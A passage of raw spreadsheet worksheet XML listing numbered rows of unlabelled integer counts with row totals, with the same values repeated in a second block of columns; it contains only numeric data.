      <c r="K1202" s="7">
        <v>4945</v>
      </c>
      <c r="L1202" s="8">
        <v>25</v>
      </c>
      <c r="M1202" s="8">
        <v>0</v>
      </c>
      <c r="N1202" s="8">
        <v>43</v>
      </c>
      <c r="O1202" s="8">
        <v>55</v>
      </c>
      <c r="P1202" s="8">
        <v>20</v>
      </c>
      <c r="Q1202" s="8">
        <v>24</v>
      </c>
    </row>
    <row r="1203" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1203" s="7">
        <v>4948</v>
      </c>
      <c r="B1203" s="8">
        <v>28</v>
      </c>
      <c r="C1203" s="8">
        <v>1</v>
      </c>
      <c r="D1203" s="8">
        <v>0</v>
      </c>
      <c r="E1203" s="8">
        <v>3</v>
      </c>
      <c r="F1203" s="8">
        <v>1</v>
      </c>
      <c r="G1203" s="8">
        <v>5</v>
      </c>
      <c r="H1203" s="8">
        <v>38</v>
      </c>
      <c r="K1203" s="7">
        <v>4948</v>
      </c>
      <c r="L1203" s="8">
        <v>28</v>
      </c>
      <c r="M1203" s="8">
        <v>1</v>
      </c>
      <c r="N1203" s="8">
        <v>0</v>
      </c>
      <c r="O1203" s="8">
        <v>3</v>
      </c>
      <c r="P1203" s="8">
        <v>1</v>
      </c>
      <c r="Q1203" s="8">
        <v>5</v>
      </c>
    </row>
    <row r="1204" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1204" s="7">
        <v>4954</v>
      </c>
      <c r="B1204" s="8">
        <v>30</v>
      </c>
      <c r="C1204" s="8">
        <v>1</v>
      </c>
      <c r="D1204" s="8">
        <v>16</v>
      </c>
      <c r="E1204" s="8">
        <v>0</v>
      </c>
      <c r="F1204" s="8">
        <v>1</v>
      </c>
      <c r="G1204" s="8">
        <v>2</v>
      </c>
      <c r="H1204" s="8">
        <v>50</v>
      </c>
      <c r="K1204" s="7">
        <v>4954</v>
      </c>
      <c r="L1204" s="8">
        <v>30</v>
      </c>
      <c r="M1204" s="8">
        <v>1</v>
      </c>
      <c r="N1204" s="8">
        <v>16</v>
      </c>
      <c r="O1204" s="8">
        <v>0</v>
      </c>
      <c r="P1204" s="8">
        <v>1</v>
      </c>
      <c r="Q1204" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="1205" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1205" s="7">
        <v>4957</v>
      </c>
      <c r="B1205" s="8">
        <v>25</v>
      </c>
      <c r="C1205" s="8">
        <v>1</v>
      </c>
      <c r="D1205" s="8">
        <v>15</v>
      </c>
      <c r="E1205" s="8">
        <v>15</v>
      </c>
      <c r="F1205" s="8">
        <v>4</v>
      </c>
      <c r="G1205" s="8">
        <v>3</v>
      </c>
      <c r="H1205" s="8">
        <v>63</v>
      </c>
      <c r="K1205" s="7">
        <v>4957</v>
      </c>
      <c r="L1205" s="8">
        <v>25</v>
      </c>
      <c r="M1205" s="8">
        <v>1</v>
      </c>
      <c r="N1205" s="8">
        <v>15</v>
      </c>
      <c r="O1205" s="8">
        <v>15</v>
      </c>
      <c r="P1205" s="8">
        <v>4</v>
      </c>
      <c r="Q1205" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="1206" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1206" s="7">
        <v>4958</v>
      </c>
      <c r="B1206" s="8">
        <v>26</v>
      </c>
      <c r="C1206" s="8">
        <v>1</v>
      </c>
      <c r="D1206" s="8">
        <v>8</v>
      </c>
      <c r="E1206" s="8">
        <v>20</v>
      </c>
      <c r="F1206" s="8">
        <v>17</v>
      </c>
      <c r="G1206" s="8">
        <v>5</v>
      </c>
      <c r="H1206" s="8">
        <v>77</v>
      </c>
      <c r="K1206" s="7">
        <v>4958</v>
      </c>
      <c r="L1206" s="8">
        <v>26</v>
      </c>
      <c r="M1206" s="8">
        <v>1</v>
      </c>
      <c r="N1206" s="8">
        <v>8</v>
      </c>
      <c r="O1206" s="8">
        <v>20</v>
      </c>
      <c r="P1206" s="8">
        <v>17</v>
      </c>
      <c r="Q1206" s="8">
        <v>5</v>
      </c>
    </row>
    <row r="1207" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1207" s="7">
        <v>4960</v>
      </c>
      <c r="B1207" s="8">
        <v>0</v>
      </c>
      <c r="C1207" s="8">
        <v>0</v>
      </c>
      <c r="D1207" s="8">
        <v>6</v>
      </c>
      <c r="E1207" s="8">
        <v>0</v>
      </c>
      <c r="F1207" s="8">
        <v>5</v>
      </c>
      <c r="G1207" s="8">
        <v>2</v>
      </c>
      <c r="H1207" s="8">
        <v>13</v>
      </c>
      <c r="K1207" s="7">
        <v>4960</v>
      </c>
      <c r="L1207" s="8">
        <v>0</v>
      </c>
      <c r="M1207" s="8">
        <v>0</v>
      </c>
      <c r="N1207" s="8">
        <v>6</v>
      </c>
      <c r="O1207" s="8">
        <v>0</v>
      </c>
      <c r="P1207" s="8">
        <v>5</v>
      </c>
      <c r="Q1207" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="1208" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1208" s="7">
        <v>4961</v>
      </c>
      <c r="B1208" s="8">
        <v>26</v>
      </c>
      <c r="C1208" s="8">
        <v>0</v>
      </c>
      <c r="D1208" s="8">
        <v>20</v>
      </c>
      <c r="E1208" s="8">
        <v>25</v>
      </c>
      <c r="F1208" s="8">
        <v>5</v>
      </c>
      <c r="G1208" s="8">
        <v>3</v>
      </c>
      <c r="H1208" s="8">
        <v>79</v>
      </c>
      <c r="K1208" s="7">
        <v>4961</v>
      </c>
      <c r="L1208" s="8">
        <v>26</v>
      </c>
      <c r="M1208" s="8">
        <v>0</v>
      </c>
      <c r="N1208" s="8">
        <v>20</v>
      </c>
      <c r="O1208" s="8">
        <v>25</v>
      </c>
      <c r="P1208" s="8">
        <v>5</v>
      </c>
      <c r="Q1208" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="1209" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1209" s="7">
        <v>4962</v>
      </c>
      <c r="B1209" s="8">
        <v>20</v>
      </c>
      <c r="C1209" s="8">
        <v>3</v>
      </c>
      <c r="D1209" s="8">
        <v>103</v>
      </c>
      <c r="E1209" s="8">
        <v>3</v>
      </c>
      <c r="F1209" s="8">
        <v>13</v>
      </c>
      <c r="G1209" s="8">
        <v>2</v>
      </c>
      <c r="H1209" s="8">
        <v>144</v>
      </c>
      <c r="K1209" s="7">
        <v>4962</v>
      </c>
      <c r="L1209" s="8">
        <v>20</v>
      </c>
      <c r="M1209" s="8">
        <v>3</v>
      </c>
      <c r="N1209" s="8">
        <v>103</v>
      </c>
      <c r="O1209" s="8">
        <v>3</v>
      </c>
      <c r="P1209" s="8">
        <v>13</v>
      </c>
      <c r="Q1209" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="1210" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1210" s="7">
        <v>4963</v>
      </c>
      <c r="B1210" s="8">
        <v>20</v>
      </c>
      <c r="C1210" s="8">
        <v>1</v>
      </c>
      <c r="D1210" s="8">
        <v>2</v>
      </c>
      <c r="E1210" s="8">
        <v>1</v>
      </c>
      <c r="F1210" s="8">
        <v>2</v>
      </c>
      <c r="G1210" s="8">
        <v>2</v>
      </c>
      <c r="H1210" s="8">
        <v>28</v>
      </c>
      <c r="K1210" s="7">
        <v>4963</v>
      </c>
      <c r="L1210" s="8">
        <v>20</v>
      </c>
      <c r="M1210" s="8">
        <v>1</v>
      </c>
      <c r="N1210" s="8">
        <v>2</v>
      </c>
      <c r="O1210" s="8">
        <v>1</v>
      </c>
      <c r="P1210" s="8">
        <v>2</v>
      </c>
      <c r="Q1210" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="1211" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1211" s="7">
        <v>4964</v>
      </c>
      <c r="B1211" s="8">
        <v>5</v>
      </c>
      <c r="C1211" s="8">
        <v>0</v>
      </c>
      <c r="D1211" s="8">
        <v>3</v>
      </c>
      <c r="E1211" s="8">
        <v>34</v>
      </c>
      <c r="F1211" s="8">
        <v>21</v>
      </c>
      <c r="G1211" s="8">
        <v>17</v>
      </c>
      <c r="H1211" s="8">
        <v>80</v>
      </c>
      <c r="K1211" s="7">
        <v>4964</v>
      </c>
      <c r="L1211" s="8">
        <v>5</v>
      </c>
      <c r="M1211" s="8">
        <v>0</v>
      </c>
      <c r="N1211" s="8">
        <v>3</v>
      </c>
      <c r="O1211" s="8">
        <v>34</v>
      </c>
      <c r="P1211" s="8">
        <v>21</v>
      </c>
      <c r="Q1211" s="8">
        <v>17</v>
      </c>
    </row>
    <row r="1212" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1212" s="7">
        <v>4965</v>
      </c>
      <c r="B1212" s="8">
        <v>27</v>
      </c>
      <c r="C1212" s="8">
        <v>0</v>
      </c>
      <c r="D1212" s="8">
        <v>3</v>
      </c>
      <c r="E1212" s="8">
        <v>0</v>
      </c>
      <c r="F1212" s="8">
        <v>2</v>
      </c>
      <c r="G1212" s="8">
        <v>0</v>
      </c>
      <c r="H1212" s="8">
        <v>32</v>
      </c>
      <c r="K1212" s="7">
        <v>4965</v>
      </c>
      <c r="L1212" s="8">
        <v>27</v>
      </c>
      <c r="M1212" s="8">
        <v>0</v>
      </c>
      <c r="N1212" s="8">
        <v>3</v>
      </c>
      <c r="O1212" s="8">
        <v>0</v>
      </c>
      <c r="P1212" s="8">
        <v>2</v>
      </c>
      <c r="Q1212" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="1213" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1213" s="7">
        <v>4967</v>
      </c>
      <c r="B1213" s="8">
        <v>24</v>
      </c>
      <c r="C1213" s="8">
        <v>1</v>
      </c>
      <c r="D1213" s="8">
        <v>4</v>
      </c>
      <c r="E1213" s="8">
        <v>4</v>
      </c>
      <c r="F1213" s="8">
        <v>3</v>
      </c>
      <c r="G1213" s="8">
        <v>1</v>
      </c>
      <c r="H1213" s="8">
        <v>37</v>
      </c>
      <c r="K1213" s="7">
        <v>4967</v>
      </c>
      <c r="L1213" s="8">
        <v>24</v>
      </c>
      <c r="M1213" s="8">
        <v>1</v>
      </c>
      <c r="N1213" s="8">
        <v>4</v>
      </c>
      <c r="O1213" s="8">
        <v>4</v>
      </c>
      <c r="P1213" s="8">
        <v>3</v>
      </c>
      <c r="Q1213" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="1214" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1214" s="7">
        <v>4969</v>
      </c>
      <c r="B1214" s="8">
        <v>26</v>
      </c>
      <c r="C1214" s="8">
        <v>0</v>
      </c>
      <c r="D1214" s="8">
        <v>1</v>
      </c>
      <c r="E1214" s="8">
        <v>0</v>
      </c>
      <c r="F1214" s="8">
        <v>4</v>
      </c>
      <c r="G1214" s="8">
        <v>0</v>
      </c>
      <c r="H1214" s="8">
        <v>31</v>
      </c>
      <c r="K1214" s="7">
        <v>4969</v>
      </c>
      <c r="L1214" s="8">
        <v>26</v>
      </c>
      <c r="M1214" s="8">
        <v>0</v>
      </c>
      <c r="N1214" s="8">
        <v>1</v>
      </c>
      <c r="O1214" s="8">
        <v>0</v>
      </c>
      <c r="P1214" s="8">
        <v>4</v>
      </c>
      <c r="Q1214" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="1215" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1215" s="7">
        <v>4978</v>
      </c>
      <c r="B1215" s="8">
        <v>26</v>
      </c>
      <c r="C1215" s="8">
        <v>0</v>
      </c>
      <c r="D1215" s="8">
        <v>3</v>
      </c>
      <c r="E1215" s="8">
        <v>20</v>
      </c>
      <c r="F1215" s="8">
        <v>1</v>
      </c>
      <c r="G1215" s="8">
        <v>1</v>
      </c>
      <c r="H1215" s="8">
        <v>51</v>
      </c>
      <c r="K1215" s="7">
        <v>4978</v>
      </c>
      <c r="L1215" s="8">
        <v>26</v>
      </c>
      <c r="M1215" s="8">
        <v>0</v>
      </c>
      <c r="N1215" s="8">
        <v>3</v>
      </c>
      <c r="O1215" s="8">
        <v>20</v>
      </c>
      <c r="P1215" s="8">
        <v>1</v>
      </c>
      <c r="Q1215" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="1216" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1216" s="7">
        <v>4982</v>
      </c>
      <c r="B1216" s="8">
        <v>26</v>
      </c>
      <c r="C1216" s="8">
        <v>0</v>
      </c>
      <c r="D1216" s="8">
        <v>0</v>
      </c>
      <c r="E1216" s="8">
        <v>0</v>
      </c>
      <c r="F1216" s="8">
        <v>7</v>
      </c>
      <c r="G1216" s="8">
        <v>5</v>
      </c>
      <c r="H1216" s="8">
        <v>38</v>
      </c>
      <c r="K1216" s="7">
        <v>4982</v>
      </c>
      <c r="L1216" s="8">
        <v>26</v>
      </c>
      <c r="M1216" s="8">
        <v>0</v>
      </c>
      <c r="N1216" s="8">
        <v>0</v>
      </c>
      <c r="O1216" s="8">
        <v>0</v>
      </c>
      <c r="P1216" s="8">
        <v>7</v>
      </c>
      <c r="Q1216" s="8">
        <v>5</v>
      </c>
    </row>
    <row r="1217" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1217" s="7">
        <v>4995</v>
      </c>
      <c r="B1217" s="8">
        <v>26</v>
      </c>
      <c r="C1217" s="8">
        <v>1</v>
      </c>
      <c r="D1217" s="8">
        <v>50</v>
      </c>
      <c r="E1217" s="8">
        <v>253</v>
      </c>
      <c r="F1217" s="8">
        <v>46</v>
      </c>
      <c r="G1217" s="8">
        <v>49</v>
      </c>
      <c r="H1217" s="8">
        <v>425</v>
      </c>
      <c r="K1217" s="7">
        <v>4995</v>
      </c>
      <c r="L1217" s="8">
        <v>26</v>
      </c>
      <c r="M1217" s="8">
        <v>1</v>
      </c>
      <c r="N1217" s="8">
        <v>50</v>
      </c>
      <c r="O1217" s="8">
        <v>253</v>
      </c>
      <c r="P1217" s="8">
        <v>46</v>
      </c>
      <c r="Q1217" s="8">
        <v>49</v>
      </c>
    </row>
    <row r="1218" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1218" s="7">
        <v>4998</v>
      </c>
      <c r="B1218" s="8">
        <v>6</v>
      </c>
      <c r="C1218" s="8">
        <v>0</v>
      </c>
      <c r="D1218" s="8">
        <v>4</v>
      </c>
      <c r="E1218" s="8">
        <v>12</v>
      </c>
      <c r="F1218" s="8">
        <v>6</v>
      </c>
      <c r="G1218" s="8">
        <v>6</v>
      </c>
      <c r="H1218" s="8">
        <v>34</v>
      </c>
      <c r="K1218" s="7">
        <v>4998</v>
      </c>
      <c r="L1218" s="8">
        <v>6</v>
      </c>
      <c r="M1218" s="8">
        <v>0</v>
      </c>
      <c r="N1218" s="8">
        <v>4</v>
      </c>
      <c r="O1218" s="8">
        <v>12</v>
      </c>
      <c r="P1218" s="8">
        <v>6</v>
      </c>
      <c r="Q1218" s="8">
        <v>6</v>
      </c>
    </row>
    <row r="1219" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1219" s="7">
        <v>5002</v>
      </c>
      <c r="B1219" s="8">
        <v>25</v>
      </c>
      <c r="C1219" s="8">
        <v>0</v>
      </c>
      <c r="D1219" s="8">
        <v>0</v>
      </c>
      <c r="E1219" s="8">
        <v>0</v>
      </c>
      <c r="F1219" s="8">
        <v>4</v>
      </c>
      <c r="G1219" s="8">
        <v>4</v>
      </c>
      <c r="H1219" s="8">
        <v>33</v>
      </c>
      <c r="K1219" s="7">
        <v>5002</v>
      </c>
      <c r="L1219" s="8">
        <v>25</v>
      </c>
      <c r="M1219" s="8">
        <v>0</v>
      </c>
      <c r="N1219" s="8">
        <v>0</v>
      </c>
      <c r="O1219" s="8">
        <v>0</v>
      </c>
      <c r="P1219" s="8">
        <v>4</v>
      </c>
      <c r="Q1219" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="1220" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1220" s="7">
        <v>5003</v>
      </c>
      <c r="B1220" s="8">
        <v>25</v>
      </c>
      <c r="C1220" s="8">
        <v>1</v>
      </c>
      <c r="D1220" s="8">
        <v>3</v>
      </c>
      <c r="E1220" s="8">
        <v>2</v>
      </c>
      <c r="F1220" s="8">
        <v>3</v>
      </c>
      <c r="G1220" s="8">
        <v>3</v>
      </c>
      <c r="H1220" s="8">
        <v>37</v>
      </c>
      <c r="K1220" s="7">
        <v>5003</v>
      </c>
      <c r="L1220" s="8">
        <v>25</v>
      </c>
      <c r="M1220" s="8">
        <v>1</v>
      </c>
      <c r="N1220" s="8">
        <v>3</v>
      </c>
      <c r="O1220" s="8">
        <v>2</v>
      </c>
      <c r="P1220" s="8">
        <v>3</v>
      </c>
      <c r="Q1220" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="1221" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1221" s="7">
        <v>5004</v>
      </c>
      <c r="B1221" s="8">
        <v>6</v>
      </c>
      <c r="C1221" s="8">
        <v>1</v>
      </c>
      <c r="D1221" s="8">
        <v>0</v>
      </c>
      <c r="E1221" s="8">
        <v>0</v>
      </c>
      <c r="F1221" s="8">
        <v>45</v>
      </c>
      <c r="G1221" s="8">
        <v>31</v>
      </c>
      <c r="H1221" s="8">
        <v>83</v>
      </c>
      <c r="K1221" s="7">
        <v>5004</v>
      </c>
      <c r="L1221" s="8">
        <v>6</v>
      </c>
      <c r="M1221" s="8">
        <v>1</v>
      </c>
      <c r="N1221" s="8">
        <v>0</v>
      </c>
      <c r="O1221" s="8">
        <v>0</v>
      </c>
      <c r="P1221" s="8">
        <v>45</v>
      </c>
      <c r="Q1221" s="8">
        <v>31</v>
      </c>
    </row>
    <row r="1222" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1222" s="7">
        <v>5005</v>
      </c>
      <c r="B1222" s="8">
        <v>0</v>
      </c>
      <c r="C1222" s="8">
        <v>0</v>
      </c>
      <c r="D1222" s="8">
        <v>4</v>
      </c>
      <c r="E1222" s="8">
        <v>1</v>
      </c>
      <c r="F1222" s="8">
        <v>1</v>
      </c>
      <c r="G1222" s="8">
        <v>2</v>
      </c>
      <c r="H1222" s="8">
        <v>8</v>
      </c>
      <c r="K1222" s="7">
        <v>5005</v>
      </c>
      <c r="L1222" s="8">
        <v>0</v>
      </c>
      <c r="M1222" s="8">
        <v>0</v>
      </c>
      <c r="N1222" s="8">
        <v>4</v>
      </c>
      <c r="O1222" s="8">
        <v>1</v>
      </c>
      <c r="P1222" s="8">
        <v>1</v>
      </c>
      <c r="Q1222" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="1223" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1223" s="7">
        <v>5007</v>
      </c>
      <c r="B1223" s="8">
        <v>26</v>
      </c>
      <c r="C1223" s="8">
        <v>1</v>
      </c>
      <c r="D1223" s="8">
        <v>28</v>
      </c>
      <c r="E1223" s="8">
        <v>38</v>
      </c>
      <c r="F1223" s="8">
        <v>0</v>
      </c>
      <c r="G1223" s="8">
        <v>1</v>
      </c>
      <c r="H1223" s="8">
        <v>94</v>
      </c>
      <c r="K1223" s="7">
        <v>5007</v>
      </c>
      <c r="L1223" s="8">
        <v>26</v>
      </c>
      <c r="M1223" s="8">
        <v>1</v>
      </c>
      <c r="N1223" s="8">
        <v>28</v>
      </c>
      <c r="O1223" s="8">
        <v>38</v>
      </c>
      <c r="P1223" s="8">
        <v>0</v>
      </c>
      <c r="Q1223" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="1224" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1224" s="7">
        <v>5010</v>
      </c>
      <c r="B1224" s="8">
        <v>26</v>
      </c>
      <c r="C1224" s="8">
        <v>1</v>
      </c>
      <c r="D1224" s="8">
        <v>8</v>
      </c>
      <c r="E1224" s="8">
        <v>2</v>
      </c>
      <c r="F1224" s="8">
        <v>4</v>
      </c>
      <c r="G1224" s="8">
        <v>1</v>
      </c>
      <c r="H1224" s="8">
        <v>42</v>
      </c>
      <c r="K1224" s="7">
        <v>5010</v>
      </c>
      <c r="L1224" s="8">
        <v>26</v>
      </c>
      <c r="M1224" s="8">
        <v>1</v>
      </c>
      <c r="N1224" s="8">
        <v>8</v>
      </c>
      <c r="O1224" s="8">
        <v>2</v>
      </c>
      <c r="P1224" s="8">
        <v>4</v>
      </c>
      <c r="Q1224" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="1225" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1225" s="7">
        <v>5011</v>
      </c>
      <c r="B1225" s="8">
        <v>26</v>
      </c>
      <c r="C1225" s="8">
        <v>1</v>
      </c>
      <c r="D1225" s="8">
        <v>2</v>
      </c>
      <c r="E1225" s="8">
        <v>2</v>
      </c>
      <c r="F1225" s="8">
        <v>0</v>
      </c>
      <c r="G1225" s="8">
        <v>0</v>
      </c>
      <c r="H1225" s="8">
        <v>31</v>
      </c>
      <c r="K1225" s="7">
        <v>5011</v>
      </c>
      <c r="L1225" s="8">
        <v>26</v>
      </c>
      <c r="M1225" s="8">
        <v>1</v>
      </c>
      <c r="N1225" s="8">
        <v>2</v>
      </c>
      <c r="O1225" s="8">
        <v>2</v>
      </c>
      <c r="P1225" s="8">
        <v>0</v>
      </c>
      <c r="Q1225" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="1226" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1226" s="7">
        <v>5015</v>
      </c>
      <c r="B1226" s="8">
        <v>0</v>
      </c>
      <c r="C1226" s="8">
        <v>7</v>
      </c>
      <c r="D1226" s="8">
        <v>0</v>
      </c>
      <c r="E1226" s="8">
        <v>0</v>
      </c>
      <c r="F1226" s="8">
        <v>0</v>
      </c>
      <c r="G1226" s="8">
        <v>4</v>
      </c>
      <c r="H1226" s="8">
        <v>11</v>
      </c>
      <c r="K1226" s="7">
        <v>5015</v>
      </c>
      <c r="L1226" s="8">
        <v>0</v>
      </c>
      <c r="M1226" s="8">
        <v>7</v>
      </c>
      <c r="N1226" s="8">
        <v>0</v>
      </c>
      <c r="O1226" s="8">
        <v>0</v>
      </c>
      <c r="P1226" s="8">
        <v>0</v>
      </c>
      <c r="Q1226" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="1227" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1227" s="7">
        <v>5020</v>
      </c>
      <c r="B1227" s="8">
        <v>25</v>
      </c>
      <c r="C1227" s="8">
        <v>0</v>
      </c>
      <c r="D1227" s="8">
        <v>15</v>
      </c>
      <c r="E1227" s="8">
        <v>0</v>
      </c>
      <c r="F1227" s="8">
        <v>8</v>
      </c>
      <c r="G1227" s="8">
        <v>1</v>
      </c>
      <c r="H1227" s="8">
        <v>49</v>
      </c>
      <c r="K1227" s="7">
        <v>5020</v>
      </c>
      <c r="L1227" s="8">
        <v>25</v>
      </c>
      <c r="M1227" s="8">
        <v>0</v>
      </c>
      <c r="N1227" s="8">
        <v>15</v>
      </c>
      <c r="O1227" s="8">
        <v>0</v>
      </c>
      <c r="P1227" s="8">
        <v>8</v>
      </c>
      <c r="Q1227" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="1228" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1228" s="7">
        <v>5022</v>
      </c>
      <c r="B1228" s="8">
        <v>24</v>
      </c>
      <c r="C1228" s="8">
        <v>1</v>
      </c>
      <c r="D1228" s="8">
        <v>0</v>
      </c>
      <c r="E1228" s="8">
        <v>0</v>
      </c>
      <c r="F1228" s="8">
        <v>30</v>
      </c>
      <c r="G1228" s="8">
        <v>48</v>
      </c>
      <c r="H1228" s="8">
        <v>103</v>
      </c>
      <c r="K1228" s="7">
        <v>5022</v>
      </c>
      <c r="L1228" s="8">
        <v>24</v>
      </c>
      <c r="M1228" s="8">
        <v>1</v>
      </c>
      <c r="N1228" s="8">
        <v>0</v>
      </c>
      <c r="O1228" s="8">
        <v>0</v>
      </c>
      <c r="P1228" s="8">
        <v>30</v>
      </c>
      <c r="Q1228" s="8">
        <v>48</v>
      </c>
    </row>
    <row r="1229" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1229" s="7">
        <v>5025</v>
      </c>
      <c r="B1229" s="8">
        <v>0</v>
      </c>
      <c r="C1229" s="8">
        <v>0</v>
      </c>
      <c r="D1229" s="8">
        <v>3</v>
      </c>
      <c r="E1229" s="8">
        <v>0</v>
      </c>
      <c r="F1229" s="8">
        <v>1</v>
      </c>
      <c r="G1229" s="8">
        <v>1</v>
      </c>
      <c r="H1229" s="8">
        <v>5</v>
      </c>
      <c r="K1229" s="7">
        <v>5025</v>
      </c>
      <c r="L1229" s="8">
        <v>0</v>
      </c>
      <c r="M1229" s="8">
        <v>0</v>
      </c>
      <c r="N1229" s="8">
        <v>3</v>
      </c>
      <c r="O1229" s="8">
        <v>0</v>
      </c>
      <c r="P1229" s="8">
        <v>1</v>
      </c>
      <c r="Q1229" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="1230" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1230" s="7">
        <v>5030</v>
      </c>
      <c r="B1230" s="8">
        <v>0</v>
      </c>
      <c r="C1230" s="8">
        <v>0</v>
      </c>
      <c r="D1230" s="8">
        <v>2</v>
      </c>
      <c r="E1230" s="8">
        <v>2</v>
      </c>
      <c r="F1230" s="8">
        <v>2</v>
      </c>
      <c r="G1230" s="8">
        <v>2</v>
      </c>
      <c r="H1230" s="8">
        <v>8</v>
      </c>
      <c r="K1230" s="7">
        <v>5030</v>
      </c>
      <c r="L1230" s="8">
        <v>0</v>
      </c>
      <c r="M1230" s="8">
        <v>0</v>
      </c>
      <c r="N1230" s="8">
        <v>2</v>
      </c>
      <c r="O1230" s="8">
        <v>2</v>
      </c>
      <c r="P1230" s="8">
        <v>2</v>
      </c>
      <c r="Q1230" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="1231" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1231" s="7">
        <v>5031</v>
      </c>
      <c r="B1231" s="8">
        <v>0</v>
      </c>
      <c r="C1231" s="8">
        <v>0</v>
      </c>
      <c r="D1231" s="8">
        <v>20</v>
      </c>
      <c r="E1231" s="8">
        <v>10</v>
      </c>
      <c r="F1231" s="8">
        <v>1</v>
      </c>
      <c r="G1231" s="8">
        <v>1</v>
      </c>
      <c r="H1231" s="8">
        <v>32</v>
      </c>
      <c r="K1231" s="7">
        <v>5031</v>
      </c>
      <c r="L1231" s="8">
        <v>0</v>
      </c>
      <c r="M1231" s="8">
        <v>0</v>
      </c>
      <c r="N1231" s="8">
        <v>20</v>
      </c>
      <c r="O1231" s="8">
        <v>10</v>
      </c>
      <c r="P1231" s="8">
        <v>1</v>
      </c>
      <c r="Q1231" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="1232" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1232" s="7">
        <v>5034</v>
      </c>
      <c r="B1232" s="8">
        <v>14</v>
      </c>
      <c r="C1232" s="8">
        <v>1</v>
      </c>
      <c r="D1232" s="8">
        <v>2</v>
      </c>
      <c r="E1232" s="8">
        <v>0</v>
      </c>
      <c r="F1232" s="8">
        <v>7</v>
      </c>
      <c r="G1232" s="8">
        <v>1</v>
      </c>
      <c r="H1232" s="8">
        <v>25</v>
      </c>
      <c r="K1232" s="7">
        <v>5034</v>
      </c>
      <c r="L1232" s="8">
        <v>14</v>
      </c>
      <c r="M1232" s="8">
        <v>1</v>
      </c>
      <c r="N1232" s="8">
        <v>2</v>
      </c>
      <c r="O1232" s="8">
        <v>0</v>
      </c>
      <c r="P1232" s="8">
        <v>7</v>
      </c>
      <c r="Q1232" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="1233" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1233" s="7">
        <v>5038</v>
      </c>
      <c r="B1233" s="8">
        <v>26</v>
      </c>
      <c r="C1233" s="8">
        <v>1</v>
      </c>
      <c r="D1233" s="8">
        <v>15</v>
      </c>
      <c r="E1233" s="8">
        <v>10</v>
      </c>
      <c r="F1233" s="8">
        <v>53</v>
      </c>
      <c r="G1233" s="8">
        <v>21</v>
      </c>
      <c r="H1233" s="8">
        <v>126</v>
      </c>
      <c r="K1233" s="7">
        <v>5038</v>
      </c>
      <c r="L1233" s="8">
        <v>26</v>
      </c>
      <c r="M1233" s="8">
        <v>1</v>
      </c>
      <c r="N1233" s="8">
        <v>15</v>
      </c>
      <c r="O1233" s="8">
        <v>10</v>
      </c>
      <c r="P1233" s="8">
        <v>53</v>
      </c>
      <c r="Q1233" s="8">
        <v>21</v>
      </c>
    </row>
    <row r="1234" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1234" s="7">
        <v>5039</v>
      </c>
      <c r="B1234" s="8">
        <v>26</v>
      </c>
      <c r="C1234" s="8">
        <v>1</v>
      </c>
      <c r="D1234" s="8">
        <v>2</v>
      </c>
      <c r="E1234" s="8">
        <v>1</v>
      </c>
      <c r="F1234" s="8">
        <v>5</v>
      </c>
      <c r="G1234" s="8">
        <v>2</v>
      </c>
      <c r="H1234" s="8">
        <v>37</v>
      </c>
      <c r="K1234" s="7">
        <v>5039</v>
      </c>
      <c r="L1234" s="8">
        <v>26</v>
      </c>
      <c r="M1234" s="8">
        <v>1</v>
      </c>
      <c r="N1234" s="8">
        <v>2</v>
      </c>
      <c r="O1234" s="8">
        <v>1</v>
      </c>
      <c r="P1234" s="8">
        <v>5</v>
      </c>
      <c r="Q1234" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="1235" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1235" s="7">
        <v>5043</v>
      </c>
      <c r="B1235" s="8">
        <v>25</v>
      </c>
      <c r="C1235" s="8">
